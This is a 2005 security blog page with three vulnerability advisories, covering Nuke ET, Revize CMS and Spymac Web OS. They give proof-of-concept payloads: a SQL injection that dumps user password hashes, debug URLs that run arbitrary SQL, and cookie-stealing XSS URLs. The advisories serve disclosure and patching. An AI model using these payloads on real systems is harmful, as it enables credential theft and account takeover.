Nuke ET 'search' module 'query' variable SQL injection

Monday, November 21, 2005
###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
OSVDB ID:21002
Secunia:SA17638
BID:15519
################################################

Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

Nuke ET 3.2
posible prior versions are afected.

##################
solution:
###################

the vendor has release a fix

http://www.truzone.org/modules.php?name=
DescNuke&d_op=getit&lid=1557


aply the fix as fast posible

####################
Timeline
####################

discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21.11.2005
disclosure:21-11-2005

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and write in the search box this proof

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users hashes are available to view..

#################### €nd ########################

Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Revize(r) CMS SQL information disclosure and XSS

Wednesday, November 16, 2005
#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
OSVDB ID: 20918,20919,20920,20921,20922
Securitytracker:1015231
Secunia:SA17623
BID:15481,15482,15484
#######################################################

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker execute or manipulate SQL
queries in the backend database.

a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

unknow version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE

¿Admin Bypass ?

http://[Victim]/revize/debug/

wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp


################### €nd ############################

thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Spymac Web OS v4 blogs and notes multiple variable XSS

Friday, November 04, 2005
#####################################################
Spymac Web OS v4 blogs and notes multiple variable XSS
Vendor url: http://www.spymac.com &
http://arnieshwartz.spymac.com/the_spymac_web_os.htm
Advisore: http://lostmon.blogspot.com/2005/11/
spymac-web-os-v4-blogs-and-notes.html
Vendor notify :yes exploit available: yes
OSVDB ID:20902,20903,20904,20905,20906,20907

#####################################################


Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.


################
VERSIONS
################

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered : 28 10 2005
Vendor notify: 02 11 2005
Vendor response:
Disclosure : 04-11-2005


###################
EXAMPLES#
###################

For exploit some vulns, you need to login.

###########
IN BLOGS
###########

http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]

http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]
&system=blogentries&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries[XSS-CODE]&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries&title=Blogs%20now%20online[XSS-CODE]

http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]

http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff
&caldate=1128146400[XSS-CODE]

###########
IN NOTES
###########

http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]
http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]
http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100[XSS-CODE]
http://[victim]/notes/index.php?isread=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]
http://[Victim]/notes/index.php?action=shownote¬eid=243633[XSS-CODE]
http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633
http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]

######################## €nd #########################

thnx to estrella to be my ligth

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...